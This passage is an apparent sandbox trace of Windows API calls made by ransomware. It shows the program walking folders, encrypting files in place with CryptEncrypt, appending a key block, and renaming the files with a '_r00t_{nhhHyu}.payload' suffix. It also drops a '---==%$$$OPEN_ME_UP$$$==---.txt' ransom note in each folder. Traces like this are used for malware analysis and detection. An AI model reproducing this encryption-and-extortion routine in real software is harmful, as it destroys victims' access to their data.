ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.043] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.043] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.043] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.043] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.043] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.043] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 39 [0060.043] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0060.043] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.043] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.043] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.043] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.044] GetTickCount () returned 0x114f713 [0060.044] GetTickCount () returned 0x114f713 [0060.044] GetTickCount () returned 0x114f713 [0060.044] GetTickCount () returned 0x114f713 [0060.044] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.044] GetProcessHeap () returned 0x5e0000 [0060.044] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.044] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xfaf, lpOverlapped=0x0) returned 1 [0060.045] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff051, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.045] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xfaf, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xfaf, lpOverlapped=0x0) returned 1 [0060.045] GetProcessHeap () returned 0x5e0000 [0060.045] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.046] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.046] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.046] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.046] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.046] CloseHandle (hObject=0x438) returned 1 [0060.047] GetProcessHeap () returned 0x5e0000 [0060.047] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.047] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0060.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0060.049] GetProcessHeap () returned 0x5e0000 [0060.049] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.049] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.049] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.049] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.049] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.049] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.049] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.049] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 48 [0060.049] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0060.049] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.049] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.049] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.049] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.049] GetTickCount () returned 0x114f713 [0060.049] GetTickCount () returned 0x114f713 [0060.049] GetTickCount () returned 0x114f713 [0060.049] GetTickCount () returned 0x114f713 [0060.049] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.049] GetProcessHeap () returned 0x5e0000 [0060.049] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.049] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.052] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.052] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.052] GetProcessHeap () returned 0x5e0000 [0060.052] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.052] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.052] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.052] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.052] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.052] CloseHandle (hObject=0x438) returned 1 [0060.055] GetProcessHeap () returned 0x5e0000 [0060.055] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.055] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0060.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0060.055] GetProcessHeap () returned 0x5e0000 [0060.055] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.055] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.055] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.055] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.055] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.055] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.055] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.055] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 49 [0060.055] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0060.055] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.056] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.056] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.056] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.056] GetTickCount () returned 0x114f713 [0060.056] GetTickCount () returned 0x114f713 [0060.056] GetTickCount () returned 0x114f713 [0060.056] GetTickCount () returned 0x114f713 [0060.056] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.056] GetProcessHeap () returned 0x5e0000 [0060.056] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.056] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.178] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.178] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.178] GetProcessHeap () returned 0x5e0000 [0060.178] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.178] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.178] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.178] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.178] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.178] CloseHandle (hObject=0x438) returned 1 [0060.180] GetProcessHeap () returned 0x5e0000 [0060.180] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.180] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0060.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0060.180] GetProcessHeap () returned 0x5e0000 [0060.180] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.180] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.181] FindClose (in: hFindFile=0x606820 | out: hFindFile=0x606820) returned 1 [0060.181] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.181] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\2070\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.181] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0060.185] CloseHandle (hObject=0x430) returned 1 [0060.185] GetProcessHeap () returned 0x5e0000 [0060.185] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.185] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="3076", cAlternateFileName="")) returned 1 [0060.185] lstrcmpiW (lpString1="3076", lpString2="Windows") returned -1 [0060.185] lstrcmpiW (lpString1="3076", lpString2="$Recycle.bin") returned 1 [0060.185] lstrcmpiW (lpString1="3076", lpString2="System Volume Information") returned -1 [0060.185] lstrcmpiW (lpString1="3076", lpString2="Program Files") returned -1 [0060.185] lstrcmpiW (lpString1="3076", lpString2="Program Files (x86)") returned -1 [0060.185] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076") returned 30 [0060.185] lstrcmpW (lpString1="3076", lpString2=".") returned 1 [0060.185] lstrcmpW (lpString1="3076", lpString2="..") returned 1 [0060.185] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\3076", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.185] GetProcessHeap () returned 0x5e0000 [0060.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.185] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\*") returned 32 [0060.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6063e0 [0060.186] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.186] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.186] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.186] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.186] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.186] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\.") returned 32 [0060.186] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.186] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.186] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.186] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.186] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.186] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.186] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.186] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\..") returned 33 [0060.186] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.186] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.186] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.186] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.186] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.186] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.186] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.186] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.186] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 39 [0060.186] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0060.186] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.186] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.186] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.186] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.187] GetTickCount () returned 0x114f7a0 [0060.187] GetTickCount () returned 0x114f7a0 [0060.187] GetTickCount () returned 0x114f7a0 [0060.187] GetTickCount () returned 0x114f7a0 [0060.187] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.187] GetProcessHeap () returned 0x5e0000 [0060.187] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.187] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x18a5, lpOverlapped=0x0) returned 1 [0060.188] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffe75b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.189] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x18a5, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x18a5, lpOverlapped=0x0) returned 1 [0060.189] GetProcessHeap () returned 0x5e0000 [0060.189] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.189] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.189] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.189] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.189] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.189] CloseHandle (hObject=0x438) returned 1 [0060.190] GetProcessHeap () returned 0x5e0000 [0060.190] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.190] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0060.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0060.192] GetProcessHeap () returned 0x5e0000 [0060.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.192] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, 